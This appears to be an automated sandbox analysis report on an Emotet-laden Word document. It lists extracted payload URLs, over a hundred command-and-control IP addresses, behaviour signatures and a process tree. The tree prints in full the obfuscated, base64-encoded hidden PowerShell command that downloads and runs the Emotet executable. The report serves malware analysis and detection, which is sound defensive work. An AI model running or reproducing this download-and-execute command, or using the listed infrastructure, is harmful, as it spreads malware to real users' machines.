Analysis
-
max time kernel
27s -
resource
win10v191014 -
submitted
18-12-2019 10:13
General
Malware Config
Extracted
https://maelkajangcanopy.com/wp-admin/JBiRPnVvr/
https://stylewebcruze.online/images/WLReuvW/
https://stperformance.co.uk/wp-admin/toubufsC/
http://jandmadventuring.servermaintain.com/wp-content/uploads/cjy4-j423i30-616378266/
https://www.liuxuebook.com/wp-content/BEtxnxQWn/
Extracted
emotet
69.14.208.221:80
156.155.163.232:80
211.42.204.154:80
164.68.115.146:8080
5.189.148.98:8080
46.105.128.215:8080
69.30.205.162:7080
182.176.116.139:995
72.51.153.27:80
124.150.175.129:8080
96.234.38.186:8080
139.59.12.63:8080
220.78.29.88:80
190.38.252.45:443
128.92.54.20:80
94.203.236.122:80
46.105.131.68:8080
162.144.46.90:8080
59.158.164.66:443
95.255.140.89:443
174.57.150.13:8080
51.38.134.203:8080
211.218.105.101:80
82.79.244.92:80
216.75.37.196:8080
82.146.55.23:7080
192.161.190.171:8080
188.230.134.205:80
187.233.220.93:443
51.77.113.97:8080
192.210.217.94:8080
37.70.131.107:80
120.51.83.89:443
88.247.26.78:80
91.117.131.122:80
172.104.70.207:8080
203.153.216.178:7080
165.100.148.200:443
138.197.140.163:8080
81.82.247.216:80
177.103.240.93:80
187.250.92.82:80
89.215.225.15:80
195.250.143.182:80
189.225.211.171:443
201.196.15.79:990
42.51.192.231:8080
181.167.35.84:80
175.103.239.50:80
181.46.176.38:80
115.179.91.58:80
190.101.87.170:80
95.216.212.157:8080
23.253.207.142:8080
46.17.6.116:8080
50.116.78.109:8080
163.172.97.112:8080
86.98.157.3:80
153.190.41.185:80
85.109.190.235:443
95.9.217.200:8080
85.235.219.74:80
200.41.121.69:443
210.111.160.220:80
119.57.36.54:8080
192.241.220.183:8080
72.27.212.209:8080
83.156.88.159:80
190.146.14.143:443
78.187.204.70:80
142.93.87.198:8080
178.134.1.238:80
158.69.167.246:8080
185.192.75.240:443
98.15.140.226:80
190.171.135.235:80
86.6.123.109:80
58.93.151.148:80
176.58.93.123:80
177.103.201.23:80
67.254.196.78:443
78.46.87.133:8080
181.47.235.26:993
78.186.102.195:80
108.184.9.44:80
221.154.59.110:80
110.142.161.90:80
201.183.251.100:80
186.84.173.136:8080
24.27.122.202:80
212.112.113.235:80
185.244.167.25:443
189.61.200.9:443
92.16.222.156:80
212.129.14.27:8080
86.70.224.211:80
91.117.31.181:80
175.127.140.68:80
24.28.178.71:80
193.33.38.208:443
87.9.181.247:80
113.52.135.33:7080
124.150.175.133:80
200.71.112.158:53
190.161.67.63:80
210.224.65.117:80
58.185.224.18:80
110.2.118.164:80
95.216.207.86:7080
37.46.129.215:8080
41.77.74.214:443
100.38.11.243:80
217.181.139.237:443
190.5.162.204:80
191.100.24.201:50000
37.59.24.25:8080
Signatures
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
Powershell.exepid Process 4524 Powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
498.exe498.exepid Process 4656 498.exe 4348 498.exe -
Suspicious behavior: EmotetMutantsSpam 1 IoCs
Processes:
498.exepid Process 4348 498.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid Process 4928 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
WINWORD.EXE498.exe498.exepid Process 4928 WINWORD.EXE 4656 498.exe 4348 498.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
WINWORD.EXEpid Process 4928 WINWORD.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
Powershell.exedescription pid Process Token: SeDebugPrivilege 4524 Powershell.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
Powershell.exe498.exedescription pid Process procid_target PID 4524 wrote to memory of 4656 4524 Powershell.exe 80 PID 4656 wrote to memory of 4348 4656 498.exe 81 -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\c1ee6f52318aedaf24c2965c71943dd9a0e6864dc20fcf2ee9f43dbd52e746c8.doc" /o ""1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of FindShellTrayWindow
PID:4928
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABIAGIAbABvAHQAbwBnAHYAPQAnAFYAcQByAG0AbgBqAHYAagBjAGUAYwB3ACcAOwAkAFkAZQB5AHUAeABtAGYAdQBjAGkAcQBwAGIAIAA9ACAAJwA0ADkAOAAnADsAJABLAG8AbAB6AG8AcgBxAHgAdQBtAD0AJwBUAG0AagByAGoAaQBjAGMAdgBuAGgAcAB6ACcAOwAkAFAAagBuAGkAZQBnAHIAdAB3AHUAaABsAGkAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFkAZQB5AHUAeABtAGYAdQBjAGkAcQBwAGIAKwAnAC4AZQB4AGUAJwA7ACQAWQByAHoAawBvAHQAYgBqAGEAPQAnAEEAYQBmAHQAeAB6AGgAagBiAHgAcwBtACcAOwAkAFcAdABiAHgAZAB1AGYAYgB6AGoAPQAuACgAJwBuAGUAJwArACcAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAG4ARQB0AC4AdwBFAEIAYwBsAGkAZQBOAFQAOwAkAEEAbgBqAHgAdQBkAHUAeQBuAGsAPQAnAGgAdAB0AHAAcwA6AC8ALwBtAGEAZQBsAGsAYQBqAGEAbgBnAGMAYQBuAG8AcAB5AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBKAEIAaQBSAFAAbgBWAHYAcgAvACoAaAB0AHQAcABzADoALwAvAHMAdAB5AGwAZQB3AGUAYgBjAHIAdQB6AGUALgBvAG4AbABpAG4AZQAvAGkAbQBhAGcAZQBzAC8AVwBMAFIAZQB1AHYAVwAvACoAaAB0AHQAcABzADoALwAvAHMAdABwAGUAcgBmAG8AcgBtAGEAbgBjAGUALgBjAG8ALgB1AGsALwB3AHAALQBhAGQAbQBpAG4ALwB0AG8AdQBiAHUAZgBzAEMALwAqAGgAdAB0AHAAOgAvAC8AagBhAG4AZABtAGEAZAB2AGUAbgB0AHUAcgBpAG4AZwAuAHMAZQByAHYAZQByAG0AYQBpAG4AdABhAGkAbgAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHUAcABsAG8AYQBkAHMALwBjAGoAeQA0AC0AagA0ADIAMwBpADMAMAAtADYAMQA2ADMANwA4ADIANgA2AC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBsAGkAdQB4AHUAZQBiAG8AbwBrAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AQgBFAHQAeABuAHgAUQBXAG4ALwAnAC4AIgBzAGAAcABsAEkAVAAiACgAJwAqACcAKQA7ACQASgBvAHIAdwBnAHYAYQB0AGsAcgBmAD0AJwBRAGcAcgBjAGoAdwBvAGgAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFUAdQBkAHAAYQBjAGgAdQBoACAAaQBuACAAJABBAG4AagB4AHUAZAB1AHkAbgBrACkAewB0AHIAeQB7ACQAVwB0AGIAeABkAHUAZgBiAHoAagAuACIARABPAHcAbgBMAG8AYABBAGAARABGAGAASQBMAEUAIgAoACQAVQB1AGQAcABhAGMAaAB1AGgALAAgACQAUABqAG4AaQBlAGcAcgB0AHcAdQBoAGwAaQApADsAJABDAHAAaQBpAHEAdABpAGYAZQBnAHcAZQBlAD0AJwBUAGEAdQBoAHAAbgBuAGMAeABxACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQAJwArACcALQBJAHQAZQAnACsAJwBtACcAKQAgACQAUABqAG4AaQBlAGcAcgB0AHcAdQBoAGwAaQApAC4AIgBsAGUAbgBHAGAAVABIACIAIAAtAGcAZQAgADIAMgAyADYAMgApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAHQAYABBAHIAVAAiACgAJABQAGoAbgBpAGUAZwByAHQAdwB1AGgAbABpACkAOwAkAEoAcQBlAGcAaAByAG8AaAB5AG4AawBhAD0AJwBBAHAAZgBtAGIAaABxAHAAdwB0ACcAOwBiAHIAZQBhAGsAOwAkAEsAcABuAGsAcgBuAGoAbwB3AG8AYgA9ACcATQB3AGYAdgBtAGsAaABuAGEAbQBuAHMAZQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABEAHUAdQBrAGcAdABoAHoAPQAnAFYAeABxAG4AcQBtAG4AcABvAG8AawAnAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4524 -
C:\Users\Admin\498.exe"C:\Users\Admin\498.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4656 -
C:\Users\Admin\498.exe--58046cd13⤵
- Executes dropped EXE
- Suspicious behavior: EmotetMutantsSpam
- Suspicious use of SetWindowsHookEx
PID:4348
-
-